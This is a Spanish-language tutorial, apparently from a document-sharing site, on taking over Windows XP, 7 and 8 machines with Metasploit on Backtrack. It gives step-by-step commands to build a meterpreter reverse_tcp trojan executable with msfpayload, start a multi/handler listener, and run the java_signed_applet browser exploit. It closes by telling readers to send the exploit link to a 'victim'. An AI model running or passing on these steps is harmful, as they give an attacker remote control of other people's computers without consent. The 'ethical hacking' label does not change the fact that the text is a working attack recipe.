Vous êtes sur la page 1sur 6

Hackeando Windows usando Backtrack

04:36 hacking etico Recopilo este antiguo post utilizado para penetrar sistemas operativos Windows en sus versiones XP, 7 y hasta 8 usando la poderosa herramienta Metasploit. Para ello usaremos 2 mtodos los cuales sern explicados en detalle para su puesta a prueba

1.- Creando Troyanos Primero debemos definir Que es un Troyano? Segun Wiki : En informtica,se denomina troyano o caballo de Troya (traduccin literal del ingls Trojan horse) a un software malicioso que se presenta al usuario como un programa aparentemente legtimo e inofensivo pero al ejecutarlo le brinda a un atacante acceso remoto al equipo infectado. En resumen, lo que haremos aqu es elaborar un archivo que al ser ejecutado en un equipo remoto podremos tomar control del mismo desde nuestro equipo atacante Segundo definiremos Que es un exploit? Es un conjunto de comandos definidos que usualmente trabajan con metasploit que cumplen el objetivo de explotar una vulnerabilidad determinada. Ahora si empecemos crackeros! Abrimos la consola y escribimos el popular comando msfconsole

Ahora introducimos el siguiente comando : msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.67 LPORT=445 x > /root/exploit.exe Analizando el comando podemos deducir lo siguiente : LHOST : Ip local desde donde ejecutaremos como "servidor" el troyano LPORT : Puerto usado, en este caso 445 root/exploit.exe: directorio y ejecutable creado Seguimos? Bien ahora activamos el handler usando el comando use exploit/multi/handler

Ahora, que es un Handler? En Metasploit, un handler es lo que utilizamos para conectar con un destino. Dependiendo del payload, el handler quedar a la escucha esperando una conexin por parte del payload (reverse payload) o iniciar una conexin contra un host en un puerto especificado (caso de un bind payload). set payload windows/meterpreter/reverse_tcp Con este comando lo que hacemos es configurar el payload para que este listo para el ataque set lhost (tu ip, ejemplo 192.168.1.67) Con este comando configuramos el lhost que como ya mencionamos es el host local y tambien podemos configurar el puerto set lport 445

Finalmente, ingresamos el comando exploit Se generara el exploit (Ojo:localmente) en el directorio que especificamos anteriormente 2.- Aprovechando una vulnerabilidad remotamente Podemos aprovechar tambin el descuido de un usuario comn al cual en nuestro caso llamaremos "victima" y aprovecharemos una vulnerabilidad propia de una aplicacin. Bueno empecemos! Introducimos el ya famoso comando msfconsole

ahora usamos el exploit que atacara esa vulnerabilidad remota use exploit/multi/browser/java_signed_applet

Ya tenemos el exploit activo y listo para configurarlo set srvhost srvhost + ip : configuramos nuestra ip en este caso la ip desde donde es enciara el exploit uripath / : Se usa para establecer una ruta fija para una peticion GET o bien aleatoria si esta NO se define. Entonces introducimos esos 2 paramentros Ahora activamos el payload ya conocido anteriormente : set payload windows/meterpreter/reverse_tcp Muy bien ahora configuraremos los parametros del payload set lhost + ip (puede ser la ip publica, puedes averiguarla visitando sistios como cualesmiip.com) ser lport 445 : El puerto que usaremos

ahora activamos el exploit exploit Ahora podremos mandar a nuestra victima el link publico el cual hara que nuestro exploit se active

Saludos crackeros!!

Vous aimerez peut-être aussi